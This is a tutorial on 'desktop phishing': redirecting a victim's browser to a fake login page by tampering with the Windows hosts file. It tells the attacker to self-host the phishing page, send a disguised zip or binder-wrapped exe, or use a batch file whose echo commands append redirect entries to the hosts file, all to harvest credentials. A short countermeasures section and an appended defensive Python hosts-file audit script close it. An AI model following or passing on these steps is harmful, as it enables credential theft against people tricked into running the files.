Though phishing and desktop phishing sound similar, there is a lot of difference between the two terms. Desktop phishing is an advanced form of phishing. In this tutorial we will take a close look at both terms.
Normal phishing:
Phishing is nothing but convincing the victim to log in to a fake page. It follows a sequence of steps, as follows:
Step 1: The attacker convinces the victim to log in to a fake page which resembles the genuine web page.
Step 2: The victim enters his/her credentials in the fake page sent by the attacker.
Step 3: All the credentials entered in the fake page are received by the attacker.
Step 4: The victim is then redirected to an error page or to the genuine website, depending on the attacker.
The main drawback of phishing is that the victim can easily differentiate between the fake page and the original page by looking at the domain name. Desktop phishing was introduced to overcome this problem.
Desktop phishing:
This process is as simple as phishing, but instead of sending a fake link to the victim, the attacker sends an executable file, i.e. a .exe or batch file.
The victim needs to double-click the received executable file. The attacker's job is then done.
The major advantage of this type of phishing is that the victim enters the original web address but is redirected to the attacker's fake page. The domain name remains the same as the original address.
The rest is the same as normal phishing.
What is a hosts file?
The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\
Whenever we visit a website, say www.sample.com, a query is sent to a domain name server (DNS) to look up the IP address associated with that website/domain. But before this happens, the hosts file on our local computer is checked for an IP address associated with the domain name.
Suppose the hosts file contains an entry that maps www.sample.com to 115.124.124.50. A visit to www.sample.com would then be taken to 115.124.124.50, and no query to resolve the IP address associated with www.sample.com would be sent to the domain name server.
So the attack can be divided into two parts:
The first is to create and host a phishing page on our computer.
The second is to modify the victim's hosts file.
Step 1) We need to host the phishing page on our computer using web server software like xampp or wampp. This is because a hosting site we upload the phishing code to would point to the IP address of its web server, not to the website.
Step 2) Modifying the hosts file can be implemented in two different ways:
Method 1) Send the victim a zip file containing a modified hosts file. When the zip file is clicked, it automatically replaces the victim's original file with the modified hosts file.
Copy your hosts file and paste it anywhere. Edit it with any text editor and associate your public address with the domain you wish.
When the victim visits gmail.com, he would be taken to the website hosted on IP xxx.xxx.xxx.xxx. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file gets replaced by our modified hosts file.
Then we can bind this file to an exe using any binder software. The victim is supposed to click it, and our job is done.
Method 2) Create a batch file which modifies the hosts file as per our need.
Open Notepad and enter the following:
echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
Save the file with the .bat extension (mandatory).
When the victim runs this file, a new entry is made in the hosts file.
Limitations of the attack:
1) We need to purchase a static IP from the ISP, since our public IP address is dynamic, so the connection will probably break every time the address changes.
2) The browser may detect the attack through the digital certificate: the fake server cannot present a valid certificate for the genuine domain, so an https connection to it raises a certificate warning.
Countermeasures:
Never blindly enter credentials in a login page, even if you typed the domain name into the web browser yourself. Check whether the protocol is http or https; https is more secure.
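A further check that follows from the hosts file behaviour described above, as an added example that is not part of the original post: it parses a hosts file and reports every entry that pins a hostname to a remote address, which is the kind of line the batch file in Method 2 appends. The sample file, the address 203.0.113.7 and the `expected` allowlist are constructed for illustration.

```python
import ipaddress

# Constructed sample hosts file. 203.0.113.7 is a documentation address
# standing in for an attacker's server; www.sample.com is the page's example.
SAMPLE_HOSTS = """\
# sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.tracker.example    # blocklist-style entry
203.0.113.7     www.sample.com
203.0.113.7.    sample.com
10.0.0.5        intranet.corp.example fileserver
"""

def parse_hosts(text):
    """Yield (line_no, address, hostnames) for every active entry."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # strip comments, split columns
        if len(fields) >= 2:
            yield line_no, fields[0], [h.lower().rstrip(".") for h in fields[1:]]

def audit_hosts(text, expected=None):
    """Return (line_no, address, hostname, reason) for suspicious entries.

    expected: hypothetical allowlist {hostname: address} of overrides the
    administrator put there on purpose.
    """
    expected = expected or {}
    findings = []
    for line_no, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings += [(line_no, addr, n, "malformed address") for n in names]
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue    # loopback and 0.0.0.0 entries do not point at a remote server
        for name in names:
            if expected.get(name) != addr:
                findings.append((line_no, addr, name, "overrides DNS"))
    return findings

if __name__ == "__main__":
    known = {"intranet.corp.example": "10.0.0.5", "fileserver": "10.0.0.5"}
    for finding in audit_hosts(SAMPLE_HOSTS, known):
        print(finding)
```

To audit a real machine, pass the contents of C:\Windows\System32\drivers\etc\hosts to `audit_hosts` instead of the sample text.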